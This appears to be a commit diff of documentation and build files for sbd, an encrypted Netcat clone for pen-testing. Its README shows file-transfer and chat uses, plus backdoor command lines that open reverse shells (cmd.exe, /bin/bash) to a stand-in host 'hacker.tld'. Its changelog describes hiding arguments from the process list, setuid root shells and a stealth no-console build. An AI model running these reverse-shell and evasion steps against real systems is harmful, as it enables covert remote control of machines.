first commit

CHANGES

@@ -0,0 +1,36 @@
+1.36: Sep 17 2004: bug fix + the -w option
+    - Made the write descriptor that's part of one of the pipes used for the
+      -e execution option non-blocking to prevent sbd from infinitely hanging
+      (under Linux at least, seems to work fine under NetBSD though).
+    - If stdin is /dev/null (or simply nothing) sbd won't exit when in normal
+      mode (without the -e option). This was a really stupid bug - discovered
+      while running an sbd process from cron.
+    - Added a timeout feature, the -w option. Now it's possible to have sbd
+      automatically disconnect if there hasn't been any activity on the wire
+      for n seconds. Feature is currently only available in the Unix version
+      of sbd (not win32).
+
+1.33: Jul 23 2004: -s option
+    - added the -s option to have sbd invoke a shell, nothing else. if sbd is
+      setuid 0, it'll invoke a root shell.
+
+1.31: Jun 20 2004: Added setuid(geteuid()) code and command line wiping.
+    - if sbd is setuid (chmod 4755 or 6755), sbd will do setuid(geteuid()) on
+      Unix-like operating systems. feature added to offer root shells during
+      pen-tests.
+    - the host, port and command to execute (-e option) specified on the
+      command line are wiped with spaces in order to hide them from the
+      process list on Unix-like operating systems (e.g. "ps auxww", "ps -Af",
+      e.g.). the -k option was wiped with stars (*) before, but now it's all
+      wiped with spaces (0x20) instead.
+
+1.27: Jun 13 2004: Bugfixes and features.
+    - implemented Christophe Devine's optimized AES-CBC-128 code
+    - resolved disconnect-on-large-transfer-bug in doexec_win32.h
+    - added the -m option (snooping)
+    - added the -n option (numeric-only IP addresses)
+
+1.23: Jun 9 2004: Minor bugfix.
+    - resolved const char* segfault bug (read-only memory) if EXECPROG != NULL
+
+1.21: Jun 8 2004: Initial release.

Makefile

@@ -0,0 +1,88 @@
+CC = gcc
+MAKE = make
+
+# extra flags
+CFLAGS=
+LDFLAGS=
+
+# cflags
+
+WIN_CFLAGS 	= -Wall -Wshadow -O2 -DWIN32
+WINMAIN_CFLAGS	= -mwindows -Wall -Wshadow -O2 -DWIN32 -DWINMAIN
+UNIX_CFLAGS	= -Wall -Wshadow -O2
+
+# ldflags
+
+WIN_LDFLAGS	= -s -lwsock32
+UNIX_LDFLAGS	= -s
+SUNOS_LDFLAGS	= -s -lresolv -lsocket -lnsl
+
+# make install (for unix-like only)
+INSTALL = install
+PREFIX = /usr/local
+BINDIR = bin
+
+#################################
+
+out = dbd
+outbg = dbdbg
+
+files = pel.c aes.c sha1.c doexec.c dbd.c
+
+#################################
+
+none:
+	@echo "usage:"
+	@echo "  make unix     - Linux, NetBSD, FreeBSD, OpenBSD"
+	@echo "  make sunos    - SunOS (Solaris)"
+	@echo "  make win32    - native win32 console app (w/ Cygwin + MinGW)"
+	@echo "  make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)"
+	@echo "  make win32bg CFLAGS=-DSTEALTH - stealthy no-console app"
+	@echo "  make mingw    - native win32 console app (w/ MinGW MSYS)"
+	@echo "  make mingwbg  - native win32 no-console app (w/ MinGW MSYS)"
+	@echo "  make cygwin   - Cygwin console app"
+	@echo "  make darwin   - Darwin"
+
+unix: clean
+	$(CC) $(UNIX_CFLAGS) $(CFLAGS) -o $(out) $(files) $(UNIX_LDFLAGS) $(LDFLAGS)
+
+sunos: clean
+	@echo "*** tested on SunOS 5.9 x86 and r220 ***"
+	$(CC) $(UNIX_CFLAGS) $(CFLAGS) -o $(out) $(files) $(SUNOS_LDFLAGS) $(LDFLAGS)
+
+cygwin: unix
+
+win32: cygmingw
+windows: cygmingw
+win32bg: cygmingwbg
+
+cygmingw: clean
+	$(CC) -mno-cygwin $(WIN_CFLAGS) $(CFLAGS) -o $(out) $(files) $(WIN_LDFLAGS) $(LDFLAGS)
+cygmingwbg: cleanbg
+	$(CC) -mno-cygwin $(WINMAIN_CFLAGS) $(CFLAGS) -o $(outbg) $(files) $(WIN_LDFLAGS) $(LDFLAGS)
+
+mingw: clean
+	$(CC) $(WIN_CFLAGS) $(CFLAGS) -o $(out) $(files) $(WIN_LDFLAGS) $(LDFLAGS)
+mingwbg: cleanbg
+	$(CC) $(WINMAIN_CFLAGS) $(CFLAGS) -o $(outbg) $(files) $(WIN_LDFLAGS) $(LDFLAGS)
+
+darwin: clean
+	$(CC) $(UNIX_CFLAGS) $(CFLAGS) -o $(out) $(files) $(LDFLAGS)
+	strip $(out)
+
+distclean: clean
+
+clean:
+	rm -f $(out) $(out).exe *.o core
+cleanbg:
+	rm -f $(outbg) $(outbg).exe *.o core
+
+install:
+	$(INSTALL) -m 755 -d $(PREFIX)/$(BINDIR)
+	$(INSTALL) -c -m 755 $(out) $(PREFIX)/$(BINDIR)/
+
+uninstall:
+	rm -f $(PREFIX)/$(BINDIR)/$(out)
+
+dist:
+	@./mktarball.sh

README

@@ -0,0 +1,147 @@
+
+                          .d8888. d8888b. d8888b.
+                          88'  YP 88  `8D 88  `8D
+                          `8bo.   88oooY' 88   88
+                            `Y8b. 88~~~b. 88   88
+                          db   8D 88   8D 88  .8D
+                          `8888Y' Y8888P' Y8888D'
+
+    Copyright (C) 2004-2005 Michel Blomgren <[email protected]>
+                    sbd is distributed under the GNU GPL
+
+
+SYNOPSIS
+~~~~~~~~
+
+sbd is a Netcat-clone, designed to be portable and offer strong encryption. It
+runs on Unix-like operating systems and on Microsoft Win32. sbd features
+AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution
+(-e option), choosing source port, continuous reconnection with delay, and
+some other nice features. sbd supports TCP/IP communication only. Source code
+and binaries are distributed under the GNU General Public License.
+
+COMPILATION
+~~~~~~~~~~~
+
+To compile sbd under a Unix-like operating system you need gcc and relevant
+development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others),
+type:
+    $ make unix
+
+For SunOS/Solaris, type:
+    $ make sunos
+
+To compile sbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or
+Cygwin with full development support (Cygwin's MinGW gcc). To compile a native
+Win32 sbd console application under Cygwin, type:
+
+    $ make win32
+
+    or, under MSYS:
+
+    $ make mingw
+
+To compile a no-console ("WinMain") application under Cygwin, type:
+
+    $ make win32bg
+
+    or, under MSYS:
+
+    $ make mingwbg
+
+To compile a Cygwin-specific console application, type:
+
+    $ make cygwin
+
+
+You may want to change the default behaviour of sbd. One of the most important
+thing is to change the default shared secret to your own pass phrase. Edit
+sbd.h and replace with your preferences. You may, for example, want to
+hardcode a host + port to connect to if sbd is started without options.
+Complete examples are provided in sbd.h.
+
+
+SAMPLE USES
+~~~~~~~~~~~
+
+With a little imagination, sbd can be used for many things...
+
+    * Use sbd to securely transfer files between two networks:
+
+        snafu$ sbd -l -p 12345 -k secret > output.file
+
+        fubar$ cat input.file | sbd -k secret snafu 12345
+
+        or from win32:
+        C:\somedir>type input.fil | sbd -k secret snafu 12345
+
+    * Use sbd as a simple (but secure) chat:
+
+        snafu$ sbd -P snafu -Hon fubar 1234
+
+        fubar$ sbd -Pfubar -Hon -l -p 1234
+
+    * Use sbd as a pen-test backdoor:
+
+        C:\hacked box>sbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443
+        ...
+
+        or under Unix-like OSes:
+
+        root@owned# ./sbd -r1800 -Don -e /bin/bash hacker.tld 993
+
+WARNING
+~~~~~~~
+
+Do not pass cached input (a file with commands or similar) to a listening "sbd
+-e" session. "sbd -e" is using pipes to pass data between the program being
+executed and sbd. Pipes are used (instead of plain pass-through duplicate file
+descriptors) because of encryption between the pipes and the socket. In order
+to prevent the writing end of one of the pipes from blocking the whole
+process, I turned it into a non-blocking descriptor. There is a chance that
+when passing too much input at a time through to the -e program, it will be
+truncated (cut off) since the pipe buffer (in the OS) can't hold all of the
+data. This problem can be solved by making sbd multi-threaded for instance,
+but I'll avoid this as long as possible for compatibility reasons.
+
+
+LICENSE
+~~~~~~~
+
+sbd Copyright (C) 2004 Michel Blomgren <[email protected]>
+
+This program is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free Software
+Foundation; either version 2 of the License, or (at your option) any later
+version.
+
+This program is distributed in the hope that it will be useful, but WITHOUT
+ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along with
+this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+Place, Suite 330, Boston, MA  02111-1307  USA
+
+See the COPYING file for more information.
+
+--
+
+sbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe
+Devine <[email protected]> and is distributed under the GNU General Public
+License (GPL).
+
+Some code (for doexec_win32.h) has been derived from doexec.c from the Win32
+port of Netcat (C) Weld Pond and *hobbit*. Parts of doexec.c is Copyright (C)
+1994 Nathaniel W. Mishkin (doexec.c code was originally derived from
+rlogind.exe).
+
+The original version of Netcat was written by *hobbit* <[email protected]>. The
+NT version was done by Weld Pond <[email protected]>.
+
+--
+Michel Blomgren <[email protected]>
+Information Security Consultant
+tigerteam.se
+